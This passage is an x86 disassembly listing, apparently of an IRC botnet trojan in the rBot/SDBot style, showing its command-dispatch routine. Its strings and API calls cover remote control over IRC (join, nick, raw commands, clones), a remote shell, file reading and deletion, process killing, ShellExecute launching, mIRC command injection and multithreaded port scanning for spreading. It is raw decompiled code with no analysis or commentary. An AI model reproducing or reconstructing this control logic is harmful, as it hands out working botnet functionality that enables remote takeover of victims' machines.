lea eax, [ebp+var_2F0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_414415
push [ebp+var_8]
call sub_4147A2
add esp, 14h
jmp short loc_40BC9E
; ---------------------------------------------------------------------------
loc_40BD0D: ; CODE XREF: sub_4089DC+20A0�j
; sub_4089DC+20B4�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_414415
mov esi, [ebp+var_8]
push esi
call sub_4147A2
add esp, 10h
test eax, eax
jle loc_40E4AE
push esi
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push esi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_405674
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40BD74: ; CODE XREF: sub_4089DC+3423�j
; sub_4089DC+3492�j ...
call sub_401F73
jmp loc_40D310
; ---------------------------------------------------------------------------
loc_40BD7E: ; CODE XREF: sub_4089DC+2078�j
; sub_4089DC+208C�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40BDB0
push esi
lea eax, [ebp+var_2F0]
push offset aModeS ; "MODE %s"
push eax
call sub_414415
add esp, 0Ch
loc_40BDB0: ; CODE XREF: sub_4089DC+33BD�j
mov edi, [ebp+var_8]
push edi
call sub_4147A2
test eax, eax
pop ecx
jle loc_40E4AE
push edi
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_405674
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40BD74
; ---------------------------------------------------------------------------
loc_40BE04: ; CODE XREF: sub_4089DC+2050�j
; sub_4089DC+2064�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
mov edi, [ebp+var_8]
push edi
call sub_4147A2
test eax, eax
pop ecx
jle loc_40E4AE
push edi
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
push esi
push offset aS_5 ; "%s\r\n"
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_405674
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40BD74
; ---------------------------------------------------------------------------
loc_40BE73: ; CODE XREF: sub_4089DC+2028�j
; sub_4089DC+203C�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_8]
push [ebp+var_14]
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_405674
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40C73E
; ---------------------------------------------------------------------------
loc_40BEAD: ; CODE XREF: sub_4089DC+2000�j
; sub_4089DC+2014�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C5A
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405674
push [ebp+var_8]
call sub_4147A2
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_420000 ; Sleep
push [ebp+ebx+var_9C]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405674
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401EFF
jmp loc_40C743
; ---------------------------------------------------------------------------
loc_40BF13: ; CODE XREF: sub_4089DC+1FD8�j
; sub_4089DC+1FEC�j
cmp [ebp+var_14], 0
jz loc_40E4AE
lea edx, [eax+1]
loc_40BF20: ; CODE XREF: sub_4089DC+3549�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BF20
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40BF31: ; CODE XREF: sub_4089DC+355A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BF31
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
push esi
lea eax, [ebp+var_2F0]
push offset dword_426F6C
push eax
call sub_414415
push 0
push 0
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_4056BF
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401F73
add esp, 2Ch
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40BF96: ; CODE XREF: sub_4089DC+1FB0�j
; sub_4089DC+1FC4�j
cmp [ebp+var_14], 0
jz loc_40E4AE
lea edx, [eax+1]
loc_40BFA3: ; CODE XREF: sub_4089DC+35CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BFA3
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40BFB4: ; CODE XREF: sub_4089DC+35DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BFB4
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_4056BF
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401F73
loc_40BFF9: ; CODE XREF: sub_4089DC+569A�j
add esp, 20h
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40C001: ; CODE XREF: sub_4089DC+1F88�j
; sub_4089DC+1F9C�j
cmp [ebp+var_14], 0
jz loc_408C5A
push [ebp+var_10]
push [ebp+var_14]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz loc_408C5A
push eax
push [ebp+var_8]
call sub_401DEF
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_414415
add esp, 14h
loc_40C040: ; CODE XREF: sub_4089DC+3C53�j
; sub_4089DC+5086�j
cmp [ebp+var_C], 0
jnz short loc_40C063
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40C063: ; CODE XREF: sub_4089DC+3668�j
; sub_4089DC+483E�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
jmp loc_40E66D
; ---------------------------------------------------------------------------
loc_40C074: ; CODE XREF: sub_4089DC+1E48�j
; sub_4089DC+1E5C�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz loc_40E4AE
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C10F
push ebx
push [ebp+var_14]
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40C0FD
push esi
push [ebp+var_A0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_414415
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4144A0
push esi
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_414415
add esp, 34h
inc [ebp+arg_24]
jmp loc_40C2B0
; ---------------------------------------------------------------------------
loc_40C0FD: ; CODE XREF: sub_4089DC+36CD�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_414415
pop ecx
pop ecx
jmp loc_40C2B0
; ---------------------------------------------------------------------------
loc_40C10F: ; CODE XREF: sub_4089DC+36B6�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_411939
add esp, 0Ch
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_41466D
add esp, 24h
jmp loc_40C2B0
; ---------------------------------------------------------------------------
loc_40C159: ; CODE XREF: sub_4089DC+1B77�j
; sub_4089DC+1B8B�j
push offset aR ; "r"
push [ebp+var_8]
call sub_414BF3
mov edi, eax
test edi, edi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40C1D7
push edi
mov esi, 200h
push esi
push eax
call sub_415C85
add esp, 0Ch
jmp short loc_40C1B1
; ---------------------------------------------------------------------------
loc_40C186: ; CODE XREF: sub_4089DC+37D7�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
push edi
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_415C85
add esp, 20h
loc_40C1B1: ; CODE XREF: sub_4089DC+37A8�j
test eax, eax
jnz short loc_40C186
push edi
call sub_4147F3
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_414415
add esp, 10h
jmp loc_40C2B0
; ---------------------------------------------------------------------------
loc_40C1D7: ; CODE XREF: sub_4089DC+3796�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
loc_40C1DF: ; CODE XREF: sub_4089DC+329E�j
push eax
call sub_414415
add esp, 0Ch
jmp loc_40C28D
; ---------------------------------------------------------------------------
loc_40C1ED: ; CODE XREF: sub_4089DC+1B4F�j
; sub_4089DC+1B63�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_8]
push [ebp+var_14]
call sub_414EE0
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40E4AE
mov edi, ebx
dec edi
loc_40C211: ; CODE XREF: sub_4089DC+383B�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C211
mov esi, offset asc_4216D8 ; "\n"
push ebx
movsw
call sub_40F039
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40C238
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40C285
; ---------------------------------------------------------------------------
loc_40C238: ; CODE XREF: sub_4089DC+3853�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_414415
add esp, 0Ch
jmp short loc_40C2B0
; ---------------------------------------------------------------------------
loc_40C249: ; CODE XREF: sub_4089DC+1B27�j
; sub_4089DC+1B3B�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_8]
push [ebp+var_14]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz loc_40E4AE
push eax
call sub_4068AF
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40C280
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40C285
; ---------------------------------------------------------------------------
loc_40C280: ; CODE XREF: sub_4089DC+389B�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40C285: ; CODE XREF: sub_4089DC+1C49�j
; sub_4089DC+1C53�j ...
push eax
call sub_414415
pop ecx
pop ecx
loc_40C28D: ; CODE XREF: sub_4089DC+1BC4�j
; sub_4089DC+1C21�j ...
cmp [ebp+var_C], 0
jnz short loc_40C2B0
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40C2B0: ; CODE XREF: sub_4089DC+371C�j
; sub_4089DC+372E�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40C2C2: ; CODE XREF: sub_4089DC+1AFF�j
; sub_4089DC+1B13�j
push 0
push [ebp+var_A0]
push [ebp+arg_4]
push [ebp+var_8]
call sub_4041A6
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40BD74
; ---------------------------------------------------------------------------
loc_40C2E2: ; CODE XREF: sub_4089DC+1AD7�j
; sub_4089DC+1AEB�j
push 20h
push [ebp+var_8]
call ds:dword_4200CC ; SetFileAttributesA
push [ebp+var_8]
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
jz short loc_40C304
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40C30F
; ---------------------------------------------------------------------------
loc_40C304: ; CODE XREF: sub_4089DC+391C�j
push offset aFile ; "[FILE]:"
call sub_4067EA
push eax
loc_40C30F: ; CODE XREF: sub_4089DC+3926�j
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
loc_40C320: ; CODE XREF: sub_4089DC+3A87�j
add esp, 10h
loc_40C323: ; CODE XREF: sub_4089DC+3A9F�j
; sub_4089DC+4EFB�j
cmp [ebp+var_C], 0
jnz loc_40A0E4
push 0
jmp loc_40A0C9
; ---------------------------------------------------------------------------
loc_40C334: ; CODE XREF: sub_4089DC+1AAF�j
; sub_4089DC+1AC3�j
push [ebp+var_8]
call sub_4147A2
push eax
call sub_4085A8
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2F0]
jnz short loc_40C35B
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40C360
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_4089DC+3976�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40C360: ; CODE XREF: sub_4089DC+397D�j
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_40A0E7
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
jmp loc_40A0E7
; ---------------------------------------------------------------------------
loc_40C395: ; CODE XREF: sub_4089DC+1A87�j
; sub_4089DC+1A9B�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4081CA
add esp, 1Ch
cmp eax, 1
jnz short loc_40C3CE
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40C3BF: ; CODE XREF: sub_4089DC+2C27�j
lea eax, [ebp+var_2F0]
loc_40C3C5: ; CODE XREF: sub_4089DC+2F79�j
; sub_4089DC+3A2B�j ...
push eax
call sub_414415
add esp, 0Ch
loc_40C3CE: ; CODE XREF: sub_4089DC+2C3C�j
; sub_4089DC+2F1D�j ...
cmp [ebp+var_C], esi
jnz loc_40A0E4
push esi
jmp loc_40A0C9
; ---------------------------------------------------------------------------
loc_40C3DD: ; CODE XREF: sub_4089DC+1A5F�j
; sub_4089DC+1A73�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_4081CA
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2F0]
jnz short loc_40C409
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40C3C5
; ---------------------------------------------------------------------------
loc_40C409: ; CODE XREF: sub_4089DC+3A24�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40C3C5
; ---------------------------------------------------------------------------
loc_40C410: ; CODE XREF: sub_4089DC+1A37�j
; sub_4089DC+1A4B�j
mov esi, [ebp+var_8]
push esi
call dword_43587C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40C438
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_4358F8 ; gethostbyaddr
test eax, eax
jz short loc_40C468
push dword ptr [eax]
jmp short loc_40C451
; ---------------------------------------------------------------------------
loc_40C438: ; CODE XREF: sub_4089DC+3A44�j
push esi
call dword_435868 ; gethostbyname
test eax, eax
jz short loc_40C468
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_435888 ; inet_ntoa
push eax
loc_40C451: ; CODE XREF: sub_4089DC+3A5A�j
push esi
lea eax, [ebp+var_2F0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_414415
jmp loc_40C320
; ---------------------------------------------------------------------------
loc_40C468: ; CODE XREF: sub_4089DC+3A56�j
; sub_4089DC+3A65�j
lea eax, [ebp+var_2F0]
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
push eax
call sub_414415
pop ecx
pop ecx
jmp loc_40C323
; ---------------------------------------------------------------------------
loc_40C480: ; CODE XREF: sub_4089DC+1A0F�j
; sub_4089DC+1A23�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_4144A0
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_414415
add esp, 18h
jmp loc_40D99F
; ---------------------------------------------------------------------------
loc_40C4A9: ; CODE XREF: sub_4089DC+19E7�j
; sub_4089DC+19FB�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_435910
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40C4D5
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40C3C5
; ---------------------------------------------------------------------------
loc_40C4D5: ; CODE XREF: sub_4089DC+3AED�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40C3C5
; ---------------------------------------------------------------------------
loc_40C4DF: ; CODE XREF: sub_4089DC+19BF�j
; sub_4089DC+19D3�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42BED0, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40D990
; ---------------------------------------------------------------------------
loc_40C4F8: ; CODE XREF: sub_4089DC+1997�j
; sub_4089DC+19AB�j
push [ebp+var_8]
call sub_4147A2
test eax, eax
pop ecx
jle loc_40E4AE
push [ebp+var_8]
call sub_4147A2
cmp eax, 1F4h
pop ecx
jge loc_40E4AE
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_40FC7C
push eax
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_414415
add esp, 1Ch
jmp loc_40BCBA
; ---------------------------------------------------------------------------
loc_40C549: ; CODE XREF: sub_4089DC+196F�j
; sub_4089DC+1983�j
mov edi, [ebp+var_8]
push edi
call sub_4147A2
test eax, eax
pop ecx
jle loc_408C5A
push edi
call sub_4147A2
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_408C5A
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call sub_405674
pop ecx
pop ecx
push esi
call ds:dword_420000 ; Sleep
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366AC[eax]
call dword_435914 ; closesocket
push [ebp+var_1C]
push edi
call sub_4147A2
imul eax, 234h
pop ecx
push dword_4366B4[eax]
call ds:dword_4200F0 ; TerminateThread
push edi
call sub_4147A2
imul eax, 234h
and dword_4366B4[eax], 0
push edi
call sub_4147A2
imul eax, 234h
and byte ptr dword_4364A0[eax], 0
pop ecx
pop ecx
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40C5F7: ; CODE XREF: sub_4089DC+1947�j
; sub_4089DC+195B�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40C634
call sub_41240B
test eax, eax
jle short loc_40C61C
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40DA53
; ---------------------------------------------------------------------------
loc_40C61C: ; CODE XREF: sub_4089DC+3C33�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40C621: ; CODE XREF: sub_4089DC+4647�j
; sub_4089DC+4666�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_414415
pop ecx
pop ecx
jmp loc_40C040
; ---------------------------------------------------------------------------
loc_40C634: ; CODE XREF: sub_4089DC+3C2A�j
mov edi, [ebp+var_20]
jmp short loc_40C6A6
; ---------------------------------------------------------------------------
loc_40C639: ; CODE XREF: sub_4089DC+3CCE�j
mov esi, [ebp+edi*4+var_A8]
test esi, esi
jz loc_408C5A
push esi
call sub_4147A2
push eax
call sub_412383
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2F0]
jz short loc_40C668
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40C66D
; ---------------------------------------------------------------------------
loc_40C668: ; CODE XREF: sub_4089DC+3C83�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40C66D: ; CODE XREF: sub_4089DC+3C8A�j
push eax
call sub_414415
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40C699
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40C699: ; CODE XREF: sub_4089DC+3C9E�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
loc_40C6A6: ; CODE XREF: sub_4089DC+3C5B�j
inc edi
cmp edi, 20h
jb short loc_40C639
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40C6B1: ; CODE XREF: sub_4089DC+191F�j
; sub_4089DC+1933�j
cmp [ebp+var_14], 0
jz loc_40E4AE
push [ebp+var_8]
push [ebp+var_14]
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E4AE
push esi
push offset aS_5 ; "%s\r\n"
push [ebp+arg_4]
call sub_405674
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40C73E
; ---------------------------------------------------------------------------
loc_40C6E8: ; CODE XREF: sub_4089DC+18F7�j
; sub_4089DC+190B�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405674
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40C73E
; ---------------------------------------------------------------------------
loc_40C702: ; CODE XREF: sub_4089DC+18CF�j
; sub_4089DC+18E3�j
push [ebp+ebx+var_A0]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405674
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40BD74
; ---------------------------------------------------------------------------
loc_40C726: ; CODE XREF: sub_4089DC+18A7�j
; sub_4089DC+18BB�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405674
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40C73E: ; CODE XREF: sub_4089DC+34CC�j
; sub_4089DC+3D0A�j ...
call sub_401F73
loc_40C743: ; CODE XREF: sub_4089DC+3532�j
add esp, 14h
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40C74B: ; CODE XREF: sub_4089DC+186D�j
; sub_4089DC+1881�j
mov cl, byte_42B22A
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42B22A
jz loc_408C5A
mov eax, edx
loc_40C764: ; CODE XREF: sub_4089DC+3D91�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40C764
test cl, cl
jz loc_408C5A
mov [ebp+var_18], edx
loc_40C77A: ; CODE XREF: sub_4089DC+406F�j
push 9
call sub_41248A
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40C7CA
push ecx
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 20h
jmp loc_40CA41
; ---------------------------------------------------------------------------
loc_40C7CA: ; CODE XREF: sub_4089DC+3DB8�j
or [ebp+var_4D8], 0FFFFFFFFh
xor esi, esi
cmp dword_42B068, esi
mov [ebp+var_4DC], 0C8h
mov [ebp+var_4F0], 5
mov [ebp+var_4EC], esi
mov [ebp+arg_0], esi
jz short loc_40C85D
mov edx, [ebp+var_18]
add edx, 0FFFFFFF6h
mov edi, offset dword_42B068
loc_40C803: ; CODE XREF: sub_4089DC+3E63�j
mov esi, edx
lea eax, [edi-28h]
loc_40C808: ; CODE XREF: sub_4089DC+3E48�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40C82C
test cl, cl
jz short loc_40C826
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40C82C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40C808
loc_40C826: ; CODE XREF: sub_4089DC+3E36�j
xor esi, esi
xor eax, eax
jmp short loc_40C833
; ---------------------------------------------------------------------------
loc_40C82C: ; CODE XREF: sub_4089DC+3E32�j
; sub_4089DC+3E40�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40C833: ; CODE XREF: sub_4089DC+3E4E�j
cmp eax, esi
jz short loc_40C843
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40C803
jmp short loc_40C85D
; ---------------------------------------------------------------------------
loc_40C843: ; CODE XREF: sub_4089DC+3E59�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42B068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40C85D: ; CODE XREF: sub_4089DC+3E1A�j
; sub_4089DC+3E65�j
cmp [ebp+var_4F4], esi
jz loc_40CA68
push 10h
pop esi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_28], esi
call dword_435780 ; getsockname
mov al, [ebp+var_45B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_68C]
push eax
call sub_4144A0
xor eax, eax
cmp [ebp+var_45B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_68C]
push eax
call sub_414470
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40C8FD
loc_40C8DD: ; CODE XREF: sub_4089DC+3F1F�j
test eax, eax
jz short loc_40C8FD
mov byte ptr [eax], 78h
lea eax, [ebp+var_68C]
push 30h
push eax
call sub_414470
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40C8DD
loc_40C8FD: ; CODE XREF: sub_4089DC+3EFF�j
; sub_4089DC+3F03�j
mov eax, [ebp+arg_4]
push [ebp+var_A0]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov ebx, 80h
lea eax, [ebp+var_5F8]
push ebx
push eax
mov [ebp+var_4C8], 1
call sub_41466D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40C965
push eax
lea eax, [ebp+var_578]
push ebx
push eax
call sub_41466D
add esp, 0Ch
jmp short loc_40C96C
; ---------------------------------------------------------------------------
loc_40C965: ; CODE XREF: sub_4089DC+3F74�j
and [ebp+var_578], 0
loc_40C96C: ; CODE XREF: sub_4089DC+3F87�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40C980
mov eax, offset aSequential ; "Sequential"
loc_40C980: ; CODE XREF: sub_4089DC+3F9D�j
push [ebp+var_4DC]
lea ecx, [ebp+var_68C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_414415
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_41229A
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_68C]
push eax
push offset sub_401B9D
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40CA5E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_414415
add esp, 0Ch
loc_40CA13: ; CODE XREF: sub_4089DC+408A�j
cmp [ebp+var_C], esi
jnz short loc_40CA34
push esi
push [ebp+var_4]
